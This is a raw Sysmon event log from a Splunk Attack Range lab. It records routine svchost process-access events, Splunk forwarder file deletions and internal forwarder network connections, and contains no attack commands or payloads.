16:30:52.191{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304B-6062-1600-00000000AF01}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246119Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:52.191{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304B-6062-1600-00000000AF01}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246118Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:52.191{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304B-6062-1600-00000000AF01}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001061386Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:49.925{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54828-false10.0.1.12-8089- 354300x80000000000000001061385Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:49.878{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54827-false10.0.1.12-8000- 23542300x8000000000000000246125Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:53.973{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACAAAC9828C525560A0A8FDD64780416,SHA256=D0DD7DAF83E3244D7E69A1A2EACC6975115159EDC34CD565DC7E621F6D0381BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246124Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:53.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF9AEE07511B4BABED0BA519E8954464,SHA256=D1E3234B1AD28610AB908744189A6C8C229B7115445C4A9759E5F71321BDBE4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246123Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:53.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BE5A2AF4445B25BDAC546C2A6FFA0EB,SHA256=A9A9E599AA952ED1D0328F5263ED5E286FEC460445D4A0C550B1D9DB07AE43E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061387Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:54.151{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46A2552A387CA515D8E3E99D75FF700A,SHA256=C45C29C41F27F22E1C92093C3BE78A78F6CCD34993F729DEC0C81C52B9837551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246127Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:54.973{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=712C735F755A33EEFB11F912E2E7592F,SHA256=A51D8A0CAC3327082E2307629CBD28B62262DBA222FAFE9518A9881BE0685EDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246126Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:54.051{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061388Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:55.511{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519AC01D1A5FAC2D3A845426E53ABE7E,SHA256=BB900568946A7BB9A18ADE62A08A44660B4C543DA8047628368204D3E8867B8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246129Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:52.499{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64797-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246128Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:55.035{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF9AEE07511B4BABED0BA519E8954464,SHA256=D1E3234B1AD28610AB908744189A6C8C229B7115445C4A9759E5F71321BDBE4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061389Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:56.901{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9C1BCE13DCB7724436ECA9010394FE,SHA256=5CDA980251AD1E746981CDE28D27A10D1F981FCC93F673E2E73EDB618A334227,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246131Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:54.468{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64798-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000246130Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:56.035{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4427465B80263A7B8602229B7E60B7FC,SHA256=C015A931A9E65BB05E1EEFE6A67D7DC746DCA2CF09DAABDF5BCD9DBF2B43106C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061390Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:55.003{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54829-false10.0.1.12-8000- 23542300x8000000000000000246132Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:57.051{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F25E5C9C8B224FE37ED2D7AD5C38C53,SHA256=DB995A82CF2E4381BB7034C045765761F6DBD9651994B9846618C96E90D28DA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061391Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:58.261{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3468CCE8D8A4B071620CEBEF2DF5BFA8,SHA256=17996971D6FAB30CA882952436971E400D21CE5B42422EFDC0724E30F776F174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246134Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:58.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5FF84C57C38A7EBA1A8780683D32406,SHA256=0C00DDA1841BFC29B5E5C657A686E06BFB3E35D1835923B983220D26B28167C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246133Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:58.051{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8AC58567BD836F1194ABC23F76F6F26,SHA256=B668E242957DFEF6FA84A55A6994D86003B7DFE0F19C91210FD0CA8FDB34AC4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061392Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:59.620{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=767C02C65102F87422DB0E93C46424C6,SHA256=2A229C04AB91573870E23FD00C54E22E1C743E55044DDA00F6081BA4064AE387,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246136Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:57.562{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64799-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246135Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:59.051{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77D9FFB630952B9CFF19DB6327FA7FD,SHA256=0D9CF48235EC242EE1C1F7E6EC17CF5AA2930B48096AB542C76BDCA1F6C94C1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061394Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:00.996{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F53F20D0689A8D56A6163A5C54C9CAFC,SHA256=CB40C136EED9C917B2CDFF59BED15E43F0C71B8675D090A1CE2ABBA5B96C3D4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061393Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:00.308{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EF8954C3F06C79194E746456CBDF7C56,SHA256=9B997795E0E5769C11830E20844CB7CBF324005F1285E52A5D98E992A42AE16D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246137Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:00.051{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5577D2AE7C8ED563B06B38488C062218,SHA256=77E0F8FE98E5CD96CE7E5459128963A567C888513C86356589F2E5DE851E07B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246138Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:01.066{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793149928BCA16BA6BDAE0602DCC0615,SHA256=B47A6DEEAF7357DD8315125C120B9E84238FEC6A127388B37FEBB1B5B33D9B6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061395Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:02.355{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=171B710DD8E475BB8E21976D2B4D015E,SHA256=AF0C2767516E08F40C9AE6B704AA1DB3C6A1A954314F6A9B80A75E01E68BF4B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246139Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:02.098{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A9BE3D1D10BDA45BA98E4161042BF4E,SHA256=94DD7818AE7EFBD7A8B8461F96797E6BCF23FAA12EF59C3630F0B36F19A94EC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061397Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:00.988{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54830-false10.0.1.12-8000- 23542300x80000000000000001061396Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:03.715{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=100A99564B631461B1C5495911B8F20A,SHA256=93842FFA535F469F8661017E9F7284295CBD7D693134722F3185962353E6C9C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246140Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:03.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=336A8DBA6AADABAFCDFC7DB7254100FE,SHA256=1C616D9311FDB532B0FF6AA9CEF10BA0BA0288E8B77BBE718C40BBB86F1BD145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246143Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:04.176{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBBC07AD1B7CD1D73364B0278640EC26,SHA256=39FE445A4CA8309FF7885450CB2AD7C5E22A94976DC070EFB08C8AF51BAC478B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246142Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:04.160{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8930767A1EC57E0CD5F8F36BBD42A1FB,SHA256=89B564516F981C3078B57F81A7BE0E2E40B054140E62485CFF4EBA18D379E4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246141Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:04.160{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DFE1DF7F1BAE9C1B6959243ECF25A4B7,SHA256=6AEFA5A304BE28BAB5FE133EB52BD410D572779634965BE83D6AD5A6E0F75362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061398Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:05.074{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA8FABBD8BF78AB2C4DE373E89918D1,SHA256=3F8DD12FE46FF173E487206917FB95EFB3F007B3BBA6A912FAEA2A33840F5632,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246145Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:03.577{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64800-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246144Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:05.238{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71073E193579B2CE9B81974D24FCFBC8,SHA256=1B0C119FD8913715D1017FC3FAC8162BA9CDF0C976FCAA5D69E2E851348D3E63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061399Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:06.434{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C844A19DE8D0D50BDF0BBDD2EDDCAB85,SHA256=5EF0371B4CC12998FD2D0DF5E54B572FD6A2031208E8D279800A70D65749FFEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246146Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:06.238{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8544C0E096869A1119FDDBEB87C38C8B,SHA256=A6B79C74805555499B752F9F61FB7832FFB60BF766406001DE7FA73579C8BB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061400Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:07.793{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A75874527D1D9C3779D14FFE3251EA4,SHA256=CA31FDFFEEB55A8D0EB29E838F1BCFC3CA3653A1FFBCF6EBD681FA3F4C24BA7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246147Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:07.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12A7E5F1A110505F600487FC911B62DD,SHA256=630E574596C6D419D254993FF2147E496CB829F358E8D8708684427419E16290,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061405Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:08.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1500-00000000AF01}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061404Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:08.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1500-00000000AF01}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061403Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 